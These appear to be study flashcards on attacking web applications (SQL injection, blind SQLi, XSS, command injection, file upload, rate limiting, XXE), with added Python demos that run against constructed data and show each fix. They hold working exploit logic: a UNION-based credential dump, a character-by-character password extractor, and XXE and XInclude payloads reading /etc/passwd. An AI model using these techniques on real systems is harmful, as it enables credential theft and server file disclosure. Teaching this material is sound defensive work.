Attacking Web Apps Flashcards

1
Q

SQL Injection

What is UNION SELECT? How can it be used to perform a SQL injection attack?

A

UNION SELECT appends the rows of a second SELECT to the results of the original query, so an attacker who controls part of a query can pull data from tables or columns the application never meant to expose. Two constraints apply: the injected SELECT must return the same number of columns as the original query, and each column's data type must be compatible with the corresponding original column (NULL is compatible with every type, which is why it is the usual placeholder on databases that enforce this).
So an attacker first determines the column count by injecting UNION SELECT with one placeholder value per column, starting with one and adding a column until the response comes back without an error. The numeric placeholders also reveal which of the columns are actually displayed in the page:

… union select 1#
… union select 1,2#
… union select 1,2,3#

After this, the attacker can enumerate the database (table and column names from the information schema, for example) and retrieve the desired data by placing the interesting columns in the positions that are displayed. Note that # ends the statement as a comment in MySQL; other databases use -- followed by a space.
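Worked example, added here and not part of the original deck: the column-count probe and the data extraction described above, run against a constructed SQLite database. The table names, the vulnerable search function and the credentials are all made up for the demo, and SQLite uses -- for comments where the flashcard's MySQL-style payloads use #.

```python
import sqlite3


def build_db():
    """Constructed in-memory schema standing in for the target application's DB."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL, category TEXT);
        INSERT INTO products VALUES (1, 'Widget', 9.99, 'tools'), (2, 'Gadget', 19.99, 'tools');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'jessamy', 'hunter2');
    """)
    return conn


def search_products_vulnerable(conn, category):
    """The bug: user input is concatenated straight into the SQL text."""
    sql = f"SELECT name, price, category FROM products WHERE category = '{category}'"
    return conn.execute(sql).fetchall()


def search_products_fixed(conn, category):
    """The fix: a parameterised query; the input can never become SQL syntax."""
    sql = "SELECT name, price, category FROM products WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()


def find_column_count(search, max_columns=10):
    """Inject UNION SELECT 1 / 1,2 / 1,2,3 ... until the query stops erroring.

    The numeric markers that come back show which columns the page displays.
    """
    for n in range(1, max_columns + 1):
        markers = ",".join(str(i) for i in range(1, n + 1))
        try:
            rows = search(f"' UNION SELECT {markers}-- ")
        except sqlite3.OperationalError:
            # "SELECTs to the left and right of UNION do not have the same number of result columns"
            continue
        return n, rows
    return None, None


def dump_users(search, ncols):
    """Put the interesting columns in two displayed positions and NULL-pad the rest.

    NULL is type-compatible with every column, which matters on databases that
    enforce UNION column types (MSSQL, Oracle); SQLite and MySQL are lenient.
    """
    cols = ["username", "password"] + ["NULL"] * (ncols - 2)
    payload = "' UNION SELECT " + ",".join(cols) + " FROM users-- "
    return sorted((row[0], row[1]) for row in search(payload))


def demo():
    """Run the whole attack against the vulnerable endpoint, then the fixed one."""
    conn = build_db()

    def vulnerable(term):
        return search_products_vulnerable(conn, term)

    ncols, markers = find_column_count(vulnerable)
    creds = dump_users(vulnerable, ncols)
    # Against the parameterised endpoint the payload is just a category name that matches nothing.
    safe = search_products_fixed(conn, "' UNION SELECT 1,2,3-- ")
    return ncols, markers, creds, safe
```

The WHERE clause matches no product for the injected input, so only the UNION rows come back: first the markers (1, 2, 3), then every username and password.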

2
Q

What is blind SQL Injection?

A

It's SQL injection in which the results of the injected query are never returned directly in the application's response. It typically occurs when the application returns only generic error messages or a fixed page but still executes the vulnerable query, so the attacker asks the database true-or-false questions and infers each answer from differences in the response content or in the application's behaviour (for example, its response time).

3
Q

What is a content-based blind SQL Injection?

A

The attacker infers the answer from the content of the response. To start, two probes are sent, one injecting a condition that is always true (such as ' AND 1=1) and one that is always false (' AND 1=2). The two responses are compared to check whether the truth of the injected condition can be told from the response content. If it can, that difference is the oracle: the attacker injects arbitrary true-or-false conditions (for example, comparing one character of a secret value) and reads each answer from the response.

4
Q

What is a time-based blind SQL injection?

A

In this type of blind SQL injection the attacker makes the database delay its answer when a condition holds, using a conditional delay such as SLEEP() in MySQL, pg_sleep() in PostgreSQL or WAITFOR DELAY in MSSQL:
IF the condition is true, wait x seconds before returning the response.
With this it is possible to tell whether the condition is true even when the application displays nothing different, as long as the delay is measurable from the client.

5
Q

This query is being used to perform a blind SQL injection, what is wrong with it?
' and substring(select password from injection 0x02 where username = 'jessamy', 1, 1) = 'a

A

The SELECT inside the substring function is a subquery used as an expression, so it must be wrapped in parentheses: substring((select password from injection 0x02 where username = 'jessamy'), 1, 1) = 'a. Without the parentheses the statement is a syntax error, the database never evaluates the comparison, and the application returns its error page instead of the true/false response the attacker is looking for.
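Worked example for cards 2 to 5, added here and not part of the original deck: a constructed "does this account exist?" endpoint that swallows SQL errors into a generic page, the content-based oracle built on it, character-by-character extraction of a password with substr((subquery), pos, 1), and the error that the unparenthesised subquery from the flashcard produces. The table, the endpoint and the credentials are invented; SQLite's substr() plays the role of substring().

```python
import sqlite3
import string

TRUE_PAGE, FALSE_PAGE, ERROR_PAGE = "Welcome back", "Unknown user", "Something went wrong"
# The parenthesised subquery that every probe embeds.
SECRET = "(SELECT password FROM users WHERE username = 'jessamy')"


def build_db():
    """Constructed in-memory table; the password of 'jessamy' is the target."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'Tr0ub4dor&3'), ('jessamy', 'k3y!');
    """)
    return conn


def check_user_vulnerable(conn, username):
    """Constructed vulnerable endpoint: the query result is never shown and errors
    collapse into a generic page, so the only signal is which of three fixed
    strings comes back. That is what makes the injection blind."""
    sql = f"SELECT 1 FROM users WHERE username = '{username}'"
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return ERROR_PAGE
    return TRUE_PAGE if row else FALSE_PAGE


def ask(conn, condition):
    """Content-based oracle: inject a condition and map the page text to True/False.
    `condition` must end inside an open string literal because the application
    supplies the closing quote, exactly as in the flashcard's payload."""
    page = check_user_vulnerable(conn, "jessamy' AND " + condition)
    if page == ERROR_PAGE:
        raise RuntimeError("injected SQL was not syntactically valid")
    return page == TRUE_PAGE


def find_length(conn, max_len=32):
    """First learn how many characters to extract."""
    for n in range(1, max_len + 1):
        if ask(conn, f"length({SECRET}) = {n} AND '1'='1"):
            return n
    return None


def extract_password(conn):
    """Recover the secret one position at a time.

    SQLite compares strings case-sensitively; MySQL's default collation does not,
    so there a second pass with BINARY or ASCII() would be needed to fix the case.
    """
    alphabet = string.digits + string.ascii_letters + string.punctuation
    recovered = ""
    for pos in range(1, find_length(conn) + 1):
        for ch in alphabet:
            literal = ch.replace("'", "''")  # the only escaping a SQL string literal needs
            if ask(conn, f"substr({SECRET}, {pos}, 1) = '{literal}"):
                recovered += ch
                break
    return recovered


def broken_payload_result(conn):
    """The flashcard's mistake: a subquery without parentheses inside substr() is a
    syntax error, so the oracle collapses to the error page and leaks nothing."""
    return check_user_vulnerable(
        conn, "jessamy' AND substr(SELECT password FROM users WHERE username = 'jessamy', 1, 1) = 'k")
```

Each probe costs one request, so a 4-character password over this 94-symbol alphabet takes at most a few hundred requests; real tooling cuts that with binary search on ASCII codes rather than a linear scan.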

6
Q

What is XSS?

A

Cross-site scripting is an attack in which an attacker injects malicious script into a web application. It happens when the application includes user-controlled input in its responses without proper validation or output encoding, so the attacker can make the website return attacker-controlled JavaScript to other users. Because that script runs in the context of the vulnerable site's origin, the same-origin policy (SOP) does not restrict it: when the malicious code executes in a victim's browser, the attacker can act as the victim in the application, read data the page can access, and compromise the victim's interaction with it.

7
Q

What is reflected XSS?

A

Also known as non-persistent, it occurs when user input from the current request is immediately echoed back in the response without being stored. Usually the victim must be induced to click a malicious URL (or submit a crafted form) that carries the payload.

8
Q

What is stored XSS?

A

Also known as persistent, it occurs when user input is stored on the target server (in a database record, a comment, a profile field, a log) and later included in pages served to other users. The victim retrieves the malicious data later, without having to click anything special.
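Worked example for cards 6 to 8, added here and not part of the original deck: the reflected-XSS bug in a constructed server-side template beside its fix, and why the fix depends on the HTML context the input lands in. The page fragments, payloads and function names are invented; the defence is the standard library's html.escape and a scheme allow-list for links. The same output-time escaping is what closes stored XSS, since the payload merely arrives from the database instead of the request.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker inputs: one aimed at element content, one at an attribute value.
TAG_PAYLOAD = '<script>alert(document.domain)</script>'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_results_vulnerable(query):
    """Reflected XSS: the search term is echoed straight into the HTML."""
    return f"<p>Results for: {query}</p>"


def render_results_fixed(query):
    """Element content: html.escape turns < > & into entities, so no tag can be injected."""
    return f"<p>Results for: {html.escape(query)}</p>"


def render_input_still_vulnerable(query):
    """Common mistake: escaping only < > & is not enough inside a quoted attribute.
    A literal quote closes the attribute and the rest becomes new attributes,
    here an event handler, with no angle bracket needed."""
    return f'<input name="q" value="{html.escape(query, quote=False)}">'


def render_input_fixed(query):
    """Attribute context: quote=True (the default) also encodes " and '."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def safe_href(url):
    """URL context: entity encoding does nothing against javascript: URLs, so the
    scheme must be allow-listed. urlsplit lower-cases the scheme and strip() removes
    the leading whitespace browsers would tolerate."""
    scheme = urlsplit(url.strip()).scheme
    return html.escape(url) if scheme in ("http", "https") else "#"
```

The rule of thumb the three contexts illustrate: encode at output time, with the encoder that matches where the data lands (element body, quoted attribute, URL, JavaScript string), never a single generic filter at input time.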

9
Q

What is DOM-Based XSS?

A

Also known as Type-0, it occurs when the page's own client-side JavaScript writes attacker-controlled data (from location.hash or document.URL, for example) into the DOM in an unsafe way. The payload may never leave the browser (a payload in the URL fragment is not sent to the server) and the HTML served by the server does not change, but the client-side code executes differently because of the malicious modification it makes to the DOM.

10
Q

What is command injection?

A

OS command injection, also known as shell injection, is a web application vulnerability that allows an attacker to run arbitrary operating system commands on the server that hosts the application, typically because user input is concatenated into a command line that is handed to a shell.
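Worked example, added here and not part of the original deck: a constructed lookup function that builds a shell command from user input, the same function without a shell, and an input allow-list in front of it. echo stands in for a real tool such as nslookup so the demo runs offline; the shell metacharacters behave exactly as they would with the real command.

```python
import re
import subprocess

# A plausible hostname: must start with a letter or digit, so values like "-c" that
# a real tool would parse as an option are rejected as well (argument injection).
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")

INJECTED = "example.com; echo INJECTED"  # constructed attacker input


def resolve_vulnerable(hostname):
    """The bug: the hostname is spliced into a command line that /bin/sh parses,
    so ; | && $( ) and backticks all mean something."""
    command = "echo resolving " + hostname
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def resolve_fixed(hostname):
    """The fix: no shell at all. The argv list goes straight to execve, so the
    metacharacters are just bytes inside one argument."""
    return subprocess.run(["echo", "resolving", hostname], capture_output=True, text=True).stdout


def is_valid_hostname(hostname):
    """Defence in depth: positive validation of the input before it reaches any command."""
    return HOSTNAME_RE.match(hostname) is not None


def resolve_validated(hostname):
    if not is_valid_hostname(hostname):
        raise ValueError(f"invalid hostname: {hostname!r}")
    return resolve_fixed(hostname)
```

If a shell is genuinely unavoidable, shlex.quote() is the correct way to quote one argument, but the argv form above is the first choice because there is nothing left to quote.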

11
Q

What is insecure file upload?

A

It occurs when a web server allows a user to upload a file without sufficiently validating its name, type, content or size. Usually it is exploited to achieve remote code execution (RCE) by uploading a web shell, but there are other possibilities and ways to cause impact.

12
Q

What are the key factors that can affect the impact of a insecure file upload exploitation?

A

There are two key factors:
* Which aspects of the file (name, extension, declared type, actual content, size) are correctly validated.
* What restrictions are imposed on the file once it has been successfully uploaded: where it is stored, whether that location can execute code, and how it is served back.

13
Q

Insecure file upload

Cite possible impacts that do not involve getting a shell.

A

Overwriting existing files (configuration files included, if the filename is not sanitised against path traversal), achieving stored XSS with an HTML or SVG file, writing files into another directory, or exhausting the machine's disk or memory to cause a denial of service.
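Worked example for cards 11 to 13, added here and not part of the original deck: an upload validator that covers the aspects listed above (size, extension allow-list, content magic bytes, and a filename the client never chooses), with constructed inputs for the web shell, traversal, null-byte and polyglot cases. The limits and the allowed types are assumptions for the demo.

```python
import os
import secrets

MAX_BYTES = 2 * 1024 * 1024
# Allowed extension -> the leading bytes a genuine file of that type must have.
# HTML and SVG are deliberately absent: either one served from the app's origin is stored XSS.
MAGIC = {
    "png":  b"\x89PNG\r\n\x1a\n",
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif":  b"GIF8",
}


def validate_upload(filename, content):
    """Return (accepted, reason, stored_name).

    stored_name is random and keeps only a vetted extension, so the client's
    filename, with any ../ components, null bytes or double extensions, never
    reaches the filesystem. That kills the overwrite and traversal impacts at the root.
    """
    if len(content) > MAX_BYTES:
        return False, "file too large", None
    # Take the extension from the basename only: "../../x.png" and "x.php\x00.png"
    # both reduce to whatever follows the last dot.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in MAGIC:
        return False, f"extension {ext!r} not allowed", None
    # Check the bytes, not the Content-Type header: the header is attacker-controlled.
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared type", None
    return True, "ok", f"{secrets.token_hex(16)}.{ext}"


# Even with these checks a polyglot (valid PNG header with PHP appended) is accepted,
# which is why the second key factor matters: the upload directory must be
# non-executable and served as static content, ideally from a separate origin,
# so a stored file can never run as code or as HTML on the application's origin.
```

Returning a random name also defeats the classic trick of uploading .htaccess or web.config to change how the directory is interpreted, because the name the attacker supplied is discarded.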

14
Q

What is account locking? What is the main weakness of this method?

A

It's a brute-force protection mechanism that locks an account when a certain criterion is met, usually a number of consecutive failed login attempts.
This method provides some protection when the attacker is brute-forcing one specific account, but it fails against credential stuffing and password spraying, where the attacker tries one or a few passwords against many accounts and never reaches the lockout threshold on any of them.

15
Q

What is rate limiting?

A

It's a brute-force protection that blocks (or throttles) a client, usually identified by its IP address, if too many login requests are made from it in a short period of time.

16
Q

What should you test in a rate limit implementation?

A

Whether the request counter resets when a successful login occurs. If it does, an attacker who holds one valid set of credentials (their own account, for instance) can log in at regular intervals and make the protection virtually useless.
Also test whether the limit can be evaded by changing your apparent IP, since there are several ways of doing that (rotating through proxies, or spoofing headers such as X-Forwarded-For if the application trusts them).

17
Q

Why is rate limiting more preferable than account locking?

A

Because rate limiting is less prone to username enumeration and denial of service: a lockout usually reveals whether a username exists (only real accounts get locked, and the message often says so) and lets an attacker lock legitimate users out of their own accounts on purpose, whereas a per-client rate limit affects only the client making the requests.
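Worked example for cards 14 to 17, added here and not part of the original deck: a minimal account-lockout policy and a sliding-window per-IP rate limiter, driven by a fake clock so the results are deterministic, with the three attacks the cards describe run against them. The user list, thresholds and the attacker's IP are invented; the reset_on_success flag exists only to reproduce the weak implementation card 16 says to test for.

```python
from collections import defaultdict, deque

USERS = {"alice": "correct horse", "bob": "battery staple", "attacker": "own-account"}  # constructed


class AccountLockout:
    """Lock a username after max_failures consecutive failed logins."""

    def __init__(self, max_failures=3):
        self.max_failures = max_failures
        self._failures = defaultdict(int)

    def is_locked(self, username):
        return self._failures[username] >= self.max_failures

    def record(self, username, success):
        self._failures[username] = 0 if success else self._failures[username] + 1


class IpRateLimiter:
    """Sliding window of login requests per source IP.

    Failed and successful requests both count, and a success does not clear the
    window unless reset_on_success is set (the weak variant, for comparison only).
    """

    def __init__(self, max_requests=5, window_seconds=60, reset_on_success=False):
        self.max_requests = max_requests
        self.window = window_seconds
        self.reset_on_success = reset_on_success
        self._hits = defaultdict(deque)

    def allow(self, ip, now):
        hits = self._hits[ip]
        while hits and now - hits[0] >= self.window:
            hits.popleft()
        return len(hits) < self.max_requests

    def record(self, ip, now, success):
        if success and self.reset_on_success:
            self._hits[ip].clear()
        else:
            self._hits[ip].append(now)


def password_spray(lockout, usernames, guess):
    """One guess per account: lockout never fires because no single account
    accumulates max_failures. Returns how many guesses were actually evaluated."""
    evaluated = 0
    for user in usernames:
        if lockout.is_locked(user):
            continue
        evaluated += 1
        lockout.record(user, USERS.get(user) == guess)
    return evaluated


def lock_out_victim(lockout, victim):
    """The denial-of-service side effect: anyone can lock someone else's account."""
    for _ in range(lockout.max_failures):
        lockout.record(victim, False)
    return lockout.is_locked(victim)


def counter_reset_attack(limiter, attempts=40, ip="203.0.113.7"):
    """Every fifth request is a login with the attacker's own valid credentials.
    Returns how many of `attempts` requests the limiter let through."""
    allowed = 0
    for i in range(attempts):
        now = float(i)  # one request per second on a fake clock
        if not limiter.allow(ip, now):
            continue
        allowed += 1
        success = (i % 5 == 4)  # the attacker's own account, so this login succeeds
        limiter.record(ip, now, success)
    return allowed
```

With reset_on_success the attacker's 40 requests all get through; without it only the first 5 in the window do, and the lockout policy lets a 100-account spray run to completion while a single user can be locked out by anyone who knows their username.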

18
Q

What is XXE?

A

XML External Entity injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It usually allows an attacker to read files on the server's filesystem or to interact with back-end systems the application can reach (server-side request forgery).

19
Q

What are XML external entities?

A

XML external entities are a type of custom XML entity whose defined value is loaded from outside the DTD in which they are declared. They are declared with the SYSTEM keyword, for example <!ENTITY xxe SYSTEM "file:///etc/passwd">, and every reference &xxe; in the document is replaced by the contents fetched from that file or URL.

20
Q

How do XXE vulnerabilities arise?

A

Some applications use XML to transmit data between the browser and the server. Applications that do this virtually always use a standard library or API to process the XML on the server. The problem is that many standard parsers support potentially dangerous features (DTDs, external entities, XInclude) by default, even when the application does not use them, so an attacker who controls the XML can turn those features on simply by declaring them.
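Worked example for cards 18 to 20, added here and not part of the original deck: the classic external-entity payload parsed by Python's standard-library SAX parser with the dangerous feature switched on and off. A temporary file stands in for /etc/passwd so the demo runs anywhere; the document structure and the function names are invented. xml.sax turned external general entity resolution off by default in Python 3.7.1, so the "on" case reproduces what older versions, and any code that re-enables the feature, do with untrusted XML.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Collects the document's character data; a real app would map it to fields."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts).strip()


def parse_untrusted_xml(xml_bytes, resolve_external_entities):
    """Parse with the standard-library SAX parser.

    feature_external_ges is the switch that decides whether <!ENTITY x SYSTEM ...>
    is fetched. Off is the safe setting; on, the parser reads whatever the SYSTEM
    identifier points at and splices it into the document.
    """
    parser = xml.sax.make_parser()
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def xxe_payload(path):
    """The classic payload: declare an external entity pointing at a local file and
    reference it in an element whose value the application echoes back."""
    return (b'<?xml version="1.0"?>'
            b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "' + path.encode() + b'">]>'
            b'<order><customer>&xxe;</customer></order>')


def demo():
    """Return (leaked, blocked): the same payload parsed with the feature on and off."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w") as f:
            f.write("SECRET-TOKEN")  # constructed stand-in for a sensitive file
        payload = xxe_payload(secret_path)
        leaked = parse_untrusted_xml(payload, resolve_external_entities=True)
        blocked = parse_untrusted_xml(payload, resolve_external_entities=False)
    return leaked, blocked
```

The practical check this illustrates: for whichever parser the application uses, find the setting that controls DTD processing and external entity resolution, and confirm it is off rather than assuming the default is safe.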

21
Q

True or false. If false, explain

You can only perform XXE attacks in requests that contain data in XML format.

A

False. The attack surface for XXE injection is obvious in many cases, when the application's HTTP requests contain XML data. Sometimes the attack surface is less visible: requests that carry no XML at all may be converted to XML or embedded in an XML document on the server side, or may accept file formats that are XML-based. By analysing the request more carefully and looking in the right places, you can still perform XXE injection attacks there.

22
Q

XXE

In which situation should you consider using a XInclude attack?

A

When an application receives client-submitted data, embeds it server-side into an XML document and then parses that document. Since the attacker does not control the entire XML document, they cannot declare or modify a DOCTYPE element and so cannot define external entities. An XInclude element, however, can be placed inside any element, and a parser with XInclude enabled will fetch the referenced resource, for example <foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>.

23
Q

True or false

Some common file formats use XML or have XML subcomponents. This is potentially dangerous because an attacker could end up reaching a hidden XXE attack surface.

A

True. For example, the SVG image format is XML-based, so an image upload feature that accepts SVG files and processes them with an XML parser can be used to deliver an XXE payload. Office document formats such as DOCX and XLSX are ZIP archives of XML files and are another common hidden surface.